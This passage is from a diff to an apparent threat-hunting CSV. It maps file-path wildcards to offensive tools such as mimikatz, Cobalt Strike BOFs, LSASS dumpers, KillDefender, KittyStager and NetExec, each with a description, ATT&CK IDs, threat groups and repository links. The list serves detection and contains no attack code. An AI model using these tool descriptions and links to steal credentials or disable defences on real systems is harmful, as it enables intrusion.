managing Kerberos tickets.","T1558.003 - T1208","TA0006 - TA0007","N/A","N/A","C2","https://github.com/wavvs/nanorobeus","1","0","N/A","10","10","234","28","2023-07-02T12:56:27Z","2022-07-04T00:33:30Z" "*\KernelTokens.sys*","offensive_tool_keyword","Tokenvator","A tool to elevate privilege with Windows Tokens","T1134 - T1078","TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/0xbadjuju/Tokenvator","1","0","N/A","N/A","10","968","208","2023-02-21T18:07:02Z","2017-12-08T01:29:11Z" -"*\Keylogger.txt*","offensive_tool_keyword","EvilnoVNC","EvilnoVNC is a Ready to go Phishing Platform","T1566 - T1566.001 - T1071 - T1071.001","TA0043 - TA0001","N/A","N/A","Phishing","https://github.com/JoelGMSec/EvilnoVNC","1","0","N/A","9","7","662","118","2023-09-25T10:50:52Z","2022-09-04T10:48:49Z" +"*\Keylogger.txt*","offensive_tool_keyword","EvilnoVNC","EvilnoVNC is a Ready to go Phishing Platform","T1566 - T1566.001 - T1071 - T1071.001","TA0043 - TA0001","N/A","N/A","Phishing","https://github.com/JoelGMSec/EvilnoVNC","1","0","N/A","9","7","662","118","2023-10-04T15:20:08Z","2022-09-04T10:48:49Z" "*\KillDefender.c*","offensive_tool_keyword","KillDefenderBOF","KillDefenderBOF is a Beacon Object File PoC implementation of pwn1sher/KillDefender - kill defender","T1055.002 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/Cerbersec/KillDefenderBOF","1","0","N/A","10","3","200","29","2022-04-12T17:45:50Z","2022-02-06T21:59:03Z" "*\KillDefender.o*","offensive_tool_keyword","KillDefenderBOF","KillDefenderBOF is a Beacon Object File PoC implementation of pwn1sher/KillDefender - kill defender","T1055.002 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/Cerbersec/KillDefenderBOF","1","0","N/A","10","3","200","29","2022-04-12T17:45:50Z","2022-02-06T21:59:03Z" -"*\kitten.exe*","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","0","N/A","10","10","175","34","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" -"*\KittyStager*","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","0","N/A","10","10","175","34","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" +"*\kitten.exe*","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","0","N/A","10","10","176","35","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" +"*\KittyStager*","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","0","N/A","10","10","176","35","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" "*\Koh.exe*","offensive_tool_keyword","cobaltstrike","Koh is a C# and Beacon Object File (BOF) toolset that allows for the capture of user credential material via purposeful token/logon session leakage.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/GhostPack/Koh","1","0","N/A","10","10","447","59","2022-07-13T23:41:38Z","2022-07-07T17:14:09Z" "*\Koh.pdb*","offensive_tool_keyword","cobaltstrike","Koh is a C# and Beacon Object File (BOF) toolset that allows for the capture of user credential material via purposeful token/logon session leakage.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/GhostPack/Koh","1","0","N/A","10","10","447","59","2022-07-13T23:41:38Z","2022-07-07T17:14:09Z" "*\Koh\Koh.*","offensive_tool_keyword","cobaltstrike","Koh is a C# and Beacon Object File (BOF) toolset that allows for the capture of user credential material via purposeful token/logon session leakage.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/GhostPack/Koh","1","0","N/A","10","10","447","59","2022-07-13T23:41:38Z","2022-07-07T17:14:09Z" -"*\krb5\*.py","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*\krb5\*.py","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" "*\KRBUACBypass*","offensive_tool_keyword","KRBUACBypass","UAC Bypass By Abusing Kerberos Tickets","T1548.002 - T1558 - T1558.003","TA0004 - TA0006","N/A","N/A","Defense Evasion","https://github.com/wh0amitz/KRBUACBypass","1","0","N/A","8","5","402","52","2023-08-10T02:51:59Z","2023-07-27T12:08:12Z" "*\Ladon.exe*","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z" "*\Ladon.ps1*","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z" +"*\laps.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" "*\LAPSDumper\*","offensive_tool_keyword","LAPSDumper","Dumping LAPS from Python","T1136.001 - T1112 - T1078.001","TA0002 - TA0004 - TA0005","N/A","N/A","Credential Access","https://github.com/n00py/LAPSDumper","1","0","N/A","10","3","222","34","2022-12-07T18:35:28Z","2020-12-19T05:15:10Z" "*\ldap_search_bof.py*","offensive_tool_keyword","bofhound","Generate BloodHound compatible JSON from logs written by ldapsearch BOF - pyldapsearch and Brute Ratel's LDAP Sentinel","T1046 - T1087 - T1003","TA0007 - TA0009 - TA0001","N/A","N/A","Discovery","https://github.com/fortalice/bofhound","1","0","N/A","5","3","252","25","2023-09-21T23:23:07Z","2022-05-10T17:41:53Z" +"*\ldap-checker.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" "*\LibSnaffle*","offensive_tool_keyword","Group3r","Find vulnerabilities in AD Group Policy","T1484.002 - T1069.002 - T1087.002","TA0007 - TA0040","N/A","N/A","AD Enumeration","https://github.com/Group3r/Group3r","1","0","N/A","N/A","5","488","47","2023-08-07T16:45:14Z","2021-07-05T05:05:42Z" "*\Loader\Loader.csproj*","offensive_tool_keyword","NixImports","A .NET malware loader using API-Hashing to evade static analysis","T1055.012 - T1562.001 - T1140","TA0005 - TA0003 - TA0040","N/A","N/A","Defense Evasion - Execution","https://github.com/dr4k0nia/NixImports","1","1","N/A","N/A","2","178","23","2023-05-30T14:14:21Z","2023-05-22T18:32:01Z" -"*\local_admins.csv*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10978","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" -"*\LocalPrivEsc\*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","2960","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*\local_admins.csv*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*\LocalPrivEsc\*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" "*\LogonScreen.exe*","offensive_tool_keyword","cobaltstrike","Erebus CobaltStrike post penetration testing plugin","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/DeEpinGh0st/Erebus","1","1","N/A","10","10","1356","214","2021-10-28T06:20:51Z","2019-09-26T09:32:00Z" "*\lsass.DMP","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" "*\lsass.dmp*","offensive_tool_keyword","cobaltstrike","Collection of beacon object files for use with Cobalt Strike to facilitate","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rookuu/BOFs","1","1","N/A","10","10","156","26","2021-02-11T10:48:12Z","2021-02-11T10:28:48Z" "*\lsass.dmp*","offensive_tool_keyword","POSTDump","perform minidump of LSASS process using few technics to avoid detection.","T1003.001 - T1055 - T1564.001","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/YOLOP0wn/POSTDump","1","0","N/A","10","2","172","21","2023-09-15T11:24:50Z","2023-09-13T11:28:51Z" -"*\LSASSProtectionBypass\*","offensive_tool_keyword","EDRSandblast-GodFault","Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/gabriellandau/EDRSandblast-GodFault","1","0","N/A","10","2","180","34","2023-08-28T18:14:20Z","2023-06-01T19:32:09Z" -"*\LsassSilentProcessExit*","offensive_tool_keyword","LsassSilentProcessExit","Command line interface to dump LSASS memory to disk via SilentProcessExit","T1003.001 - T1059.003","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/deepinstinct/LsassSilentProcessExit","1","0","N/A","10","5","421","64","2020-12-23T11:51:21Z","2020-11-29T08:49:42Z" +"*\LSASSProtectionBypass\*","offensive_tool_keyword","EDRSandblast-GodFault","Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/gabriellandau/EDRSandblast-GodFault","1","0","N/A","10","2","183","35","2023-08-28T18:14:20Z","2023-06-01T19:32:09Z" +"*\LsassSilentProcessExit*","offensive_tool_keyword","LsassSilentProcessExit","Command line interface to dump LSASS memory to disk via SilentProcessExit","T1003.001 - T1059.003","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/deepinstinct/LsassSilentProcessExit","1","0","N/A","10","5","422","64","2020-12-23T11:51:21Z","2020-11-29T08:49:42Z" +"*\lsassy_dump.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" "*\m3-gen.py*","offensive_tool_keyword","MaliciousMacroMSBuild","Generates Malicious Macro and Execute Powershell or Shellcode via MSBuild Application Whitelisting Bypass.","T1059.001 - T1059.003 - T1127 - T1027.002","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/infosecn1nja/MaliciousMacroMSBuild","1","0","N/A","8","5","488","117","2019-08-06T08:16:05Z","2018-04-09T23:16:30Z" "*\MaccaroniC2*","offensive_tool_keyword","MaccaroniC2","A proof-of-concept Command & Control framework that utilizes the powerful AsyncSSH Python library which provides an asynchronous client and server implementation of the SSHv2 protocol and use PyNgrok wrapper for ngrok integration.","T1090 - T1059.003","TA0011 - TA0002","N/A","N/A","C2","https://github.com/CalfCrusher/MaccaroniC2","1","0","N/A","10","10","57","9","2023-06-27T17:43:59Z","2023-05-21T13:33:48Z" +"*\MachineAccountQuota.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" "*\macoffe.pdb*","offensive_tool_keyword","Earth Lusca Operations Tools","Earth Lusca Operations Tools and commands","T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005","TA0001 - TA0002 - TA0003","cobaltstrike - mimikatz - powersploit - shadowpad - winnti","Earth Lusca","Exploitation tools","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*\malseclogon.*","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","0","N/A","N/A","10","1467","208","2023-09-04T01:25:27Z","2021-11-10T18:28:15Z" "*\MalStuff.cpp*","offensive_tool_keyword","D1rkInject","Threadless injection that loads a module into the target process and stomps it and reverting back memory protections and original memory state","T1055 - T1055.012 - T1055.002 - T1574.002","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/D1rkInject","1","0","N/A","9","2","129","24","2023-08-02T02:45:46Z","2023-08-02T02:13:55Z" "*\malware_runner.py*","offensive_tool_keyword","power-pwn","An offensive and defensive security toolset for Microsoft 365 Power Platform","T1078 - T1078.004 - T1136 - T1136.001 - T1021 - T1021.003 - T1114 - T1114.002","TA0003 - TA0004 - TA0005 - TA0001","N/A","N/A","Exploitation tools","https://github.com/mbrg/power-pwn","1","0","N/A","10","4","360","34","2023-09-12T12:44:44Z","2022-06-14T11:40:21Z" -"*\manspider_*.log*","offensive_tool_keyword","MANSPIDER","Spider entire networks for juicy files sitting on SMB shares. Search filenames or file content - regex supported!","T1046 - T1021 - T1021.002 - T1114 - T1114.001 - T1083","TA0007 - TA0009 - TA0010","N/A","N/A","Discovery","https://github.com/blacklanternsecurity/MANSPIDER","1","0","N/A","8","8","772","119","2023-10-03T03:50:49Z","2020-03-18T13:27:20Z" -"*\master\GPSCoordinates\*","offensive_tool_keyword","GPSCoordinates","Tracks the system's GPS coordinates (accurate within 1km currently) if Location Services are enabled","T1018 - T1059.001","TA0001 - TA0002","N/A","N/A","Reconnaissance","https://github.com/matterpreter/OffensiveCSharp/tree/master/GPSCoordinates","1","0","N/A","10","10","1214","251","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" -"*\Mayhem.psm1*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10978","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*\manspider_*.log*","offensive_tool_keyword","MANSPIDER","Spider entire networks for juicy files sitting on SMB shares. Search filenames or file content - regex supported!","T1046 - T1021 - T1021.002 - T1114 - T1114.001 - T1083","TA0007 - TA0009 - TA0010","N/A","N/A","Discovery","https://github.com/blacklanternsecurity/MANSPIDER","1","0","N/A","8","8","773","119","2023-10-04T11:08:17Z","2020-03-18T13:27:20Z" +"*\masky.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*\master\GPSCoordinates\*","offensive_tool_keyword","GPSCoordinates","Tracks the system's GPS coordinates (accurate within 1km currently) if Location Services are enabled","T1018 - T1059.001","TA0001 - TA0002","N/A","N/A","Reconnaissance","https://github.com/matterpreter/OffensiveCSharp/tree/master/GPSCoordinates","1","0","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" +"*\Mayhem.psm1*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" "*\mem_dll.pdb*","offensive_tool_keyword","Earth Lusca Operations Tools","Earth Lusca Operations Tools and commands","T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005","TA0001 - TA0002 - TA0003","cobaltstrike - mimikatz - powersploit - shadowpad - winnti","Earth Lusca","Exploitation tools","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*\mhydeath64*","offensive_tool_keyword","mhydeath","Abusing mhyprotect to kill AVs / EDRs / XDRs / Protected Processes.","T1562.001","TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/zer0condition/mhydeath","1","0","N/A","10","3","251","47","2023-08-22T08:01:04Z","2023-08-22T07:15:36Z" -"*\mimi32.exe*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 